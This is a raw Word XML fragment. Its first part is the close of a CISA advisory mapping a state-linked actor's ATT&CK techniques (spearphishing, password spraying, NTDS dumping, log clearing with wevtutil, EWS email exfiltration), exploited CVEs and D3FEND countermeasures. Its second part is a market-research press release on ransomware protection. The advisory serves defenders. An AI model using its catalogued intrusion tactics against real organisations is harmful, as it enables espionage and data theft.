        <w:t>Gather Victim Org Information T1591 Conducted reconnaissance of the cybersecurity department.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Gather Victim Org Information: Identify Roles T1591.004 Conducted reconnaissance of individuals responsible for coordinating transport. Gather Victim Org Information: Business Relationships T1591.002 Conducted reconnaissance of other companies cooperating with the victim entity. Gather Victim Host Information T1592 Attempted to enumerate Real Time Streaming Protocol (RTSP) servers hosting IP cameras.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3: Resource development Tactic/Technique Title ID Use Compromise Accounts: Email Accounts T1586.002 Sent phishing emails using compromised accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Compromise Accounts: Cloud Accounts T1586.003 Sent phishing emails using compromised accounts.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4: Initial Access Tactic/Technique Title ID Use Trusted Relationship T1199 Conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access. Phishing T1566 Used spearphishing for credentials and delivering malware to gain initial access to targeted entities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Phishing: Spearphishing Attachment T1566.001 Sent emails with malicious attachments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Phishing: Spearphishing Link T1566.002 Used spearphishing with included links to fake login pages. Sent emails with embedded hyperlinks that downloaded a malicious archive.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Phishing: Spearphishing Voice T1566.004 Attempted to use voice phishing to gain access to privileged accounts by impersonating IT staff.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>External Remote Services T1133 Exploited Internet-facing infrastructure, including corporate VPNs, to gain initial access to targeted entities. Exploit Public-Facing Application T1190 Exploited public vulnerabilities and SQL injection to gain initial access to targeted entities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Content Injection T1659 Leveraged a WinRAR vulnerability allowing for the execution of arbitrary code embedded in an archive. Table 5: Execution Tactic/Technique Title ID Use User Execution: Malicious Link T1204.001 Used malicious links to hosted shortcuts in spearphishing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>User Execution: Malicious File T1204.002 Delivered malware executables via spearphishing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Scheduled Task/Job: Scheduled Task T1053.005 Used scheduled tasks to establish persistence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Command and Scripting Interpreter T1059 Delivered scripts in spearphishing. Executed arbitrary shell commands.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Command and Scripting Interpreter: PowerShell T1059.001 PowerShell commands were often used to prepare data for exfiltration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Command and Scripting Interpreter: Windows Command Shell T1059.003 Used BAT script in spearphishing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Command and Scripting Interpreter: Visual Basic T1059.005 Used VBScript in spearphishing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Command and Scripting Interpreter: Python T1059.006 Installed python on infected machines to enable the execution of Certipy. Table 6: Persistence Tactic/Technique Title ID Use Account Manipulation: Additional Email Delegate Permissions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T1098.002 Used manipulation of mailbox permissions to establish sustained email collection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Modify Authentication Process: Multi-Factor Authentication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T1556.006 Enrolled compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Hijack Execution Flow: DLL Search Order Hijacking T1574.001 Used DLL search order hijacking to facilitate malware execution.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder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T1547.001 Used run keys to establish persistence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Boot or Logon Autostart Execution: Shortcut Modification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T1547.009</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Placed malicious shortcuts in the startup folder to establish persistence. Table 7: Defense Evasion Tactic/Technique Title ID Use Indicator Removal: Clear Windows Event Logs T1070.001 Deleted event logs through the wevtutil utility. Table 8: Credential access Tactic/Technique Title ID Use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Brute Force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T1110</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Sent requests with Base64-encoded credentials for the RTSP server, which included publicly documented default credentials, and likely were generic attempts to brute force access to the devices.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Brute Force: Password Guessing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T1110.001</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Used credential guessing to gain initial access to targeted entities.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Brute Force: Password Spraying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T1110.003</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Used brute force to gain initial access to targeted entities. Conducted a brute force password spray via LDAP.</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Multi-Factor Authentication Interception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T1111</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Used multi-stage redirectors to provide MFA relaying capabilities in some campaigns.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Input Capture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T1056</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Used multi-stage redirectors to provide CAPTCHA relaying capabilities in some campaigns.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Forced Authentication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T1187</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Used an Outlook NTLM vulnerability to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations.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OS Credential Dumping: NTDS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T1003.003</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Attempted to dump Active Directory NTDS.dit domain databases.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Unsecured Credentials: Group Policy Preferences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T1552.006</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Retrieved plaintext passwords via Group Policy Preferences using Get- GPPPassword.py. Table 9: Discovery Tactic/Technique Title ID Use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Account Discovery: Domain Account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T1087.002</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Used a modified ldap-dump.py to enumerate the Windows environment. Table 10: Command and Control Tactic/Technique Title ID Use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Hide Infrastructure T1665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Abused SOHO devices to facilitate covert cyber operations, as well as proxy malicious activity, via devices with geolocation in proximity to the target.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Proxy: External Proxy T1090.002</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Actor-controlled servers sent RTSP DESCRIBE requests destined for RTSP servers.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Proxy: Multi-hop Proxy T1090.003</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Used Tor and commercial VPNs as part of their anonymization infrastructure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Encrypted Channel T1573</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Connected to victim infrastructure using encrypted TLS.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Multi-Stage Channels T1104</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Used multi-stage redirectors for campaigns. Table 11: Defense evasion (mobile framework) Tactic/Technique Title ID Use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Execution Guardrails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T1627</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Used multi-stage redirectors to verify browser fingerprints in some campaigns.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Execution Guardrails: Geofencing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T1627.001</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Used multi-stage redirectors to verify IP-geolocation in some campaigns. Table 12: Lateral movement Tactic/Technique Title ID Use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Lateral Movement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TA0008</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Used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment.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Remote Services: Remote Desktop Protocol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T1021.001</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Moved laterally within the network using RDP. Table 13: Collection Tactic/Technique Title ID Use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Email Collection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T1114</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Retrieved sensitive data from email servers.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Email Collection: Remote Email Collection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T1114.002</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Used server data exchange protocols and APIs such as Exchange Web Services (EWS) and IMAP to exfiltrate data from email servers.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Automated Collection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T1119</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Used periodic EWS queries to collect new emails.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Video Capture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T1125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Attempted to gain access to the cameras' feeds.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Archive Collected Data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T1560</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Accessed files were archived in .zip files prior to exfiltration.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Archive Collected Data: Archive via Utility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T1560.001</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Prepared zip archives for upload to the actors' infrastructure. Table 14: Exfiltration Tactic/Technique Title ID Use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Exfiltration Over Alternative Protocol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T1048</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Attempted to exfiltrate archived data via a previously dropped OpenSSH binary.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Scheduled Transfer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T1029</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Used periodic EWS queries to collect new emails sent and received since the last data exfiltration.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Appendix B: CVEs exploited Table 15: Exploited CVE information CVE Vendor/Product Details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CVE-2023-38831</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RARLAB WinRAR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Allows execution of arbitrary code when a user attempts to view a benign file within a ZIP archive.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CVE-2023-23397</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Microsoft Outlook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External actors could send specially crafted emails that cause a connection from the victim to an untrusted location of the actor's control, leaking the Net-NTLMv2 hash of the victim that the actor could then relay to another service to authenticate as the victim.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CVE-2021-44026</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Roundcube Webmail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Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to a potential SQL injection via search or search params.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CVE-2020-35730</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Roundcube Webmail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 XSS issue was discovered in Roundcube Webmail before 1.2.13, 1.3.x before 1.3.16 and 1.4.x before 1.4.10, where a plaintext email message with JavaScript in a link reference element is mishandled by linkref_addindex in rcube_string_replacer.php.</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CVE-2020-12641</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Roundcube Webmail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Roundcube Webmail before 1.4.4 allows arbitrary code execution via shell metacharacters in a configuration setting for im_convert_path or im_identify_path in rcube_image.php. Appendix C: MITRE D3FEND Countermeasures Table 16: MITRE D3FEND countermeasures Countermeasure Title ID Details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Network Isolation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D3-NI</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Employ appropriate network segmentation. Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers.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Access Mediation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D3-AMED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Limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions. Configure access controls carefully to ensure that only well-maintained and well- authenticated accounts have access.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Inbound Traffic Filtering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D3-ITF</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Implement host firewall rules to block connections from other devices on the network, other than from authorized management devices and servers, to prevent lateral movement.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Resource Access Pattern Analysis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D3-RAPA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Use automated tools to audit access logs for security concerns and identify anomalous access requests.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Outbound Traffic Filtering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D3-OTF</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Block NTLM/SMB requests to external infrastructure.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Platform Monitoring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D3-PM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Install EDR/logging/cybersecurity solutions onto high value systems with large amounts of sensitive data such as mail servers and domain controllers.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System File Analysis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D3-SFA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Collect and monitor Windows logs for certain events, especially for events that indicate that a log was cleared unexpectedly.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Application Hardening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D3-AH</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Enable optional security features in Windows to harden endpoints and mitigate initial access techniques.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Application-based Process Isolation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D3-ABPI</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Enable attack surface reduction rules to prevent executable content from email.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Executable Allowlisting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D3-EAL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Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA%.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Execution Isolation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D3-EI</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Unless users are involved in the development of scripts, limit the execution of scripts (such as batch, JavaScript, and PowerShell) to known scripts.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Application Configuration Hardening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D3-ACH</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Disable Windows Host Scripting functionality and configure PowerShell to run in Constrained mode. Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication. Turn off other ports/services not in use (e.g., FTP, web interface, etc.).</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Process Spawn Analysis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D3-PSA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Use open source SIGMA rules as a baseline for detecting and alerting on suspicious file execution or command parameters.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URL Reputation Analysis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D3-URA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Use services that provide enhanced browsing services and safe link checking.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Network Access Mediation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D3-NAM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 not allow incoming traffic, especially logins to systems, from public VPN services. Where possible, logins from public VPNs, including exit nodes in the same country as target systems, should be blocked or, if allowed, alerted on for further investigation. Ensure cameras and other Internet of Things devices are protected by a security appliance, if possible.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DNS Denylisting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D3-DNSDL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 not allow outgoing traffic to hosting and API mocking services frequently used by malicious actors.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Domain Name Reputation Analysis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D3-DNRA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Heuristic detections for web requests to new subdomains may uncover malicious phishing activity. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims.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Multi-factor Authentication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D3-MFA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Use MFA with strong factors and require regular re-authentication, especially for management accounts.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Job Function Access Pattern Analysis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D3-JFAPA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Implement other mitigations for privileged accounts: including limiting the number of admin accounts, considering using hardware MFA tokens, and regularly reviewing all privileged user accounts.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User Account Permissions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D3-UAP</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Separate privileged accounts by role and alert on misuse of privileged accounts. Audit user accounts on all devices to ensure they are an accurate reflection of your organization and that they are being used as expected.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Token-based Authentication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D3-TBA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Reduce reliance on passwords; instead, consider using services like single sign-on.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Credential Hardening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D3-CH</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 not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts.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Authentication Event Threshholding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D3-ANET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Use account throttling or account lockout. Throttling progressively increases time delay between successive login attempts. If using account lockout, allow between 5 to 10 attempts before lockout.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Strong Password Policy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D3-SPP</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Use a service to check for compromised passwords before using them.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Credential Rotation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D3-CRO</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Change all default credentials.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Encrypted Tunnels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D3-ET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Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols). Use a VPN for remote connections to devices.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Software Update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D3-SU</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Apply security patches and firmware updates to all devices. Ensure devices are currently supported. Replace devices that are end-of-life.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Agent Authentication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D3-AA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Ensure authentication is enabled for remote access to devices. If supported on IP cameras, enable authenticated RTSP access only.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User Behavior Analysis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D3-UBA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Review all authentication activity for remote access to make sure it is valid and expected. Investigate any unexpected or unusual activity.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2025.05.21 17:48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ransomware Protection Solutions Market to Grow at Double-Digit CAGR, Reaching USD 51.71 Billion by 2031 | Valuates Reports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News provided by Valuates Reports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Apr 21, 2025, 12:55 ET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Ransomware Protection Market is Segmented by Type (Cloud-based, On- Premise), by Application (Small and Midsize Organizations, Large Enterprises).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BANGALORE, India, April 21, 2025 /PRNewswire/ - The Ransomware Protection Market was valued at USD 21830 Million in the year 2024 and is projected to reach a revised size of USD 51710 Million by 2031, growing at a CAGR of 13.3% during the forecast period.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Claim Your Free Report: https://reports.valuates.com/request/sample/QYRE- Auto-0N6462/Global_Ransomware_Protection_Market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Major Factors Driving the Growth of Ransomware Protection Market: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ransomware protection market has shifted from niche add-on to core operational necessity, blending prevention, detection, isolation, and rapid recovery in unified platforms consumed as cloud services, appliances, or MSSP offerings. As attacks rise in sophistication and impact, purchasing authority has climbed from IT managers to executive committees, securing budgets and driving a double-digit CAGR. Differentiation now centres on immutable-snapshot efficiency, zero-trust integration, and automated orchestration that restores business processes within defined service levels. Vendor ecosystems increasingly align with cyber-insurers, auditors, and channel partners, embedding protection into risk-management workflows. With regulatory scrutiny tightening and hybrid work normalised, demand for ransomware-defence solutions is set to outpace security spending throughout the decade.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Unlock Insights: View Full Report Now! https://reports.valuates.com/market- reports/QYRE-Auto-0N6462/global-ransomware-protection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TRENDS INFLUENCING THE GROWTH OF THE RANSOMWARE PROTECTION MARKET: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Cloud-based ransomware protection platforms are propelling market expansion by delivering enterprise-grade security without capital expenditure or maintenance burdens. Multi-tenant architectures spread cost across thousands of customers, so even small IT teams gain instant access to behavioural analytics, sandbox detonation, immutable cloud backups, and forensic automation. Continuous streaming of threat intelligence into shared models improves detection fidelity in near real time, shrinking attacker dwell time from days to minutes and speeding automated quarantines. API-driven onboarding connects endpoints, SaaS applications, and hybrid workloads within hours, accelerating adoption cycles.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Subscription pricing converts capital outlays into predictable operating expenses, matching CFO budgeting preferences. As organisations migrate workloads to public clouds, aligning security controls with architectures becomes non-negotiable, driving sustained demand for cloud-native ransomware defences.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On-premise ransomware protection solutions continue to underwrite market growth by satisfying data sovereignty, ultra-low-latency, and regulatory audit requirements cloud deployments cannot always meet. Integrated appliances consolidate air-gapped backup, machine-learning intrusion detection, hardware-assisted encryption, and immutable snapshots within a single rack, enabling rapid isolation of malicious processes while preserving operational technology networks. Local execution avoids cloud egress charges for petabyte-scale file stores and delivers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>performance critical to healthcare imaging, trading systems, and semiconductor fabs. Seamless APIs plug into SIEM and SOAR frameworks, leveraging existing capital investments and staff expertise. Vendors now bundle "clean-room" recovery orchestration, allowing instant failover to standby clusters during incidents. As zero-trust mandates sweep critical infrastructure, controlled gateways remain indispensable, ensuring steady demand for on- premise ransomware protection platforms.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Small and midsize organisations are emerging as a pivotal demand engine for ransomware protection vendors because they face enterprise-grade threats without equivalent in-house expertise. Turnkey endpoint-plus-backup bundles with guided remediation workflows transform complex security operations into manageable dashboards, empowering lean IT teams to prevent, detect, and recover. Cyber-insurance carriers increasingly require documented controls, forcing SMEs to deploy multilayered defences to qualify for premiums. Subscription pricing, distributor leasing, and managed security service provider offerings lower upfront barriers, while automated policy templates assure compliance with ISO 27001 and SOC 2. Because ransomware downtime can threaten survival, board-level risk appetite converts into orders, translating awareness into revenue. This segment therefore underwrites sustained, high-volume growth across the ransomware protection market, satisfying business continuity requirements.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Ransomware groups have evolved from simple encryption to multi-stage campaigns involving credential theft, lateral movement, and double- extortion data leaks. Human-operated toolkits such as Cobalt Strike, Mimikatz, and living-off-the-land binaries bypass signature-based defenses and exploit unpatched services with hands-on-keyboard precision. Ransomware- as-a-Service portals lower technical barriers, swelling the pool of threat actors and increasing attack frequency. Privacy-centric cryptocurrencies reduce traceability, emboldening criminals to demand record-high ransoms. High-profile breaches in healthcare, pipelines, and city councils demonstrate catastrophic impact, compelling boards to prioritise dedicated budgets. This relentless tactical evolution guarantees continuous demand for layered, adaptive, and rapidly updated defence platforms capable of countering emerging adversarial techniques globally.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shift to hybrid and remote work has scattered corporate assets across home offices and public networks, dramatically broadening the attack surface. Employees access sensitive data over consumer routers and unmanaged personal devices while VPN concentrators strain under peak loads, encouraging risky split-tunnelling shortcuts. Phishing lures tailored to remote staff exploit isolation and deliver ransomware via weaponised documents and collaboration-tool macros. As distributed work becomes permanent, CISOs deploy endpoint detection, identity federation, and zero- trust segmentation that travel with the user, not the building. Investment in cloud-managed protection suites enforcing consistent policy across heterogeneous devices therefore grows inexorably, turning remote work into a structural driver of sustained market demand.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Stringent data-protection statutes such as GDPR, HIPAA, CCPA, and the proposed EU NIS2 directive threaten crippling fines, personal liability, and class-action lawsuits for breaches involving sensitive data. Tight notification windows force organisations to maintain continuous breach visibility and immutable evidence. Ransomware, which blends data exfiltration with operational disruption, sits squarely in regulators' sights. Boards allocate compliance budgets to purpose-built defences that include automated reporting, chain-of-custody retention, and forensic logging. Insurers tighten underwriting criteria around backup immutability and privilege-access management, effectively mandating investment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Regulatory escalation converts legal exposure into concrete buying decisions, enlarging the addressable market via harmonised expectations.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Soaring cyber-insurance premiums have prompted stringent security prerequisites. Insurers now demand proof of immutable off-site backups, multifactor authentication, and continuous monitoring before issuing or renewing policies. Organisations adopt ransomware-specific protection suites to reduce incident probability and satisfy questionnaires for favourable deductibles. Vendors collaborate with insurers to provide dashboards mapping controls directly to underwriting criteria, streamlining audits. As premiums remain volatile, investment in proven defences hedges against escalating insurance costs, reinforcing recurring demand for protection platforms aligned with evolving actuarial models globally.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manufacturing, logistics, and healthcare, each hour of downtime means lost production, missed shipments, or compromised patient care. Incidents can trigger contractual penalties and reputational damage far exceeding ransom demands. Organisations now embed recovery time objectives into board- level KPIs, procuring solutions that detect threats and instantly fail over to isolated clean environments. Immutable snapshots, continuous data- protection journaling, and orchestrated restore workflows bring applications back within minutes. Some vendors even guarantee recovery windows underwritten by financial penalties. As ransomware shifts from IT nuisance to existential operational threat, business-continuity-centric strategies accelerate across global supply chains, anchoring market growth.</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Cryptocurrencies' anonymity and borderless nature facilitate ransom collection, cementing ransomware as a profitable criminal enterprise. Mixing services, privacy coins, and decentralised exchanges allow actors to launder proceeds with minimal risk, fuelling an upward spiral in attack volume. Regulators debate wallet-level sanctions, yet payment pressure persists. Proactive investment in hardened endpoints, least-privilege controls, and immutable backups becomes a cost-effective alternative to paying ransoms. Vendors integrate blockchain analytics to flag early negotiation indicators. Insurance brokers increasingly exclude payouts through obfuscated crypto channels, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>intensifying urgency even further; the robustness of illicit infrastructure consequently sustains growth in preventative and recovery-focused protection spending.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small enterprises lack 24x7 security operations centres, so they outsource detection and response to managed security service providers. MSSPs aggregate clients onto shared threat-intelligence feeds, lowering per- seat pricing and democratising advanced capabilities. Vendors build multi- tenant consoles, white-label reporting, and flexible licensing for resellers, accelerating reach without direct sales overhead. Distributor- led training certifies partners in rapid deployment and remediation, shortening adoption timelines. Compliance frameworks requiring continuous monitoring position MSSPs as turnkey pathways to meet mandates, boosting partner-driven revenues. This virtuous cycle between solution providers and service channels reinforces growth in underserved mid-market segments where expertise remains scarce.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Claim Yours Now! https://reports.valuates.com/api/directpaytoken?rcode=QYRE- Auto-0N6462&amp;lic=single-user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RANSOMWARE PROTECTION MARKET SHARE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North America commands the largest share of spending thanks to early cloud adoption, stringent breach-reporting laws, and frequent high-value incidents.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Europe follows as GDPR fines and sectoral directives anchor consistent investment across finance, healthcare, and manufacturing. Asia-Pacific records the fastest growth, where rapid digitalisation outpaces security maturity and government cyber-resilience programmes spur adoption among enterprises and SMEs alike.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major global companies of Ransomware Protection include McAfee, LLC, AO Kaspersky Lab, Bitdefender, FireEye, Inc., Malwarebytes, SentinelOne, Sophos Ltd., Symantec Corporation, Trend Micro Incorporated, Zscaler, Inc, etc.</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Key Companies: McAfee Inc AO Kaspersky Lab Bitdefender FireEye Malwarebytes SentinelOne Sophos Ltd.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Symantec Corporation Trend Micro Incorporated Zscaler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Purchase Chapters: https://reports.valuates.com/market-reports/QYRE-Auto- 0N6462/global-ransomware-protection/1</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SUBSCRIPTION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 have introduced a tailor-made subscription for our customers. Please leave a note in the Comment Section to know about our subscription plans.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DISCOVER MORE INSIGHTS: EXPLORE SIMILAR REPORTS!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The Enterprise Ransomware Protection Market was valued at USD 819 Million in the year 2024 and is projected to reach a revised size of USD 1185 Million by 2031, growing at a CAGR of 5.5% during the forecast period.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Ransomware Protection Technology Market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Critical Infrastructure Protection market was valued at USD 105050 Million in 2023 and is anticipated to reach USD 153550 Million by 2030, witnessing a CAGR of 5.5% during the forecast period 2024-2030.</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Spear Phishing Protection Market was estimated to be worth USD 808.1 Million in 2023 and is forecast to a readjusted size of USD 1206.8 Million by 2030 with a CAGR of 5.4% during the forecast period 2024-2030.</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Advanced Malware Protection (AMP) Market was estimated to be worth USD 8910 Million in 2023 and is forecast to a readjusted size of USD 19570 Million by 2030 with a CAGR of 11.6% during the forecast period 2024-2030.</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Ransomware Detection and Response Software Market was valued at USD 1340 Million in the year 2023 and is projected to reach a revised size of USD 1734 Million by 2030, growing at a CAGR of 4.2% during the forecast period.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Malware Removal and Protection Software Market was valued at USD 2486 Million in the year 2024 and is projected to reach a revised size of USD 3049 Million by 2031, growing at a CAGR of 3.0% during the forecast period.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Advanced Malware Protection Software Market was estimated to be worth USD 8100 Million in 2023 and is forecast to a readjusted size of USD 21600 Million by 2030 with a CAGR of 15.0% during the forecast period 2024-2030.</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IT Resilience Orchestration Automation (ITRO) Software market is projected to grow from USD 335 Million in 2024 to USD 552.6 Million by 2030, at a Compound Annual Growth Rate (CAGR) of 8.7% during the forecast period.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Business Firewall Software Market was valued at USD 2530 Million in the year 2024 and is projected to reach a revised size of USD 4035 Million by 2031, growing at a CAGR of 7.0% during the forecast period.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Integrated Cloud Email Security (ICES) Market was valued at USD 1414 Million in the year 2024 and is projected to reach a revised size of USD 3680 Million by 2031, growing at a CAGR of 14.8% during the forecast period.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DISCOVER OUR VISION: VISIT ABOUT US!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Valuates offers in-depth market insights into various industries. Our extensive report repository is constantly updated to meet your changing industry analysis needs.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Our team of market analysts can help you select the best report covering your industry. We understand your niche region-specific requirements and that's why we offer customization of reports. With our customization in place, you can request for any particular information from a report that meets your market analysis needs.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 achieve a consistent view of the market, data is gathered from various primary and secondary sources, at each step, data triangulation methodologies are applied to reduce deviance and find a consistent view of the market. Each sample we share contains a detailed research methodology employed to generate the report. Please also reach our sales team to get the complete list of our data sources.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GET A FREE QUOTE Valuates Reports [email protected] For U.S. Toll-Free Call 1-(315)-215-3225 WhatsApp: +91-9945648335 Website: https://reports.valuates.com Blog: https://valuatestrends.blogspot.com/ Pinterest: https://in.pinterest.com/valuatesreports/ Twitter: https://twitter.com/valuatesreports Facebook: </w:t>
      </w:r>
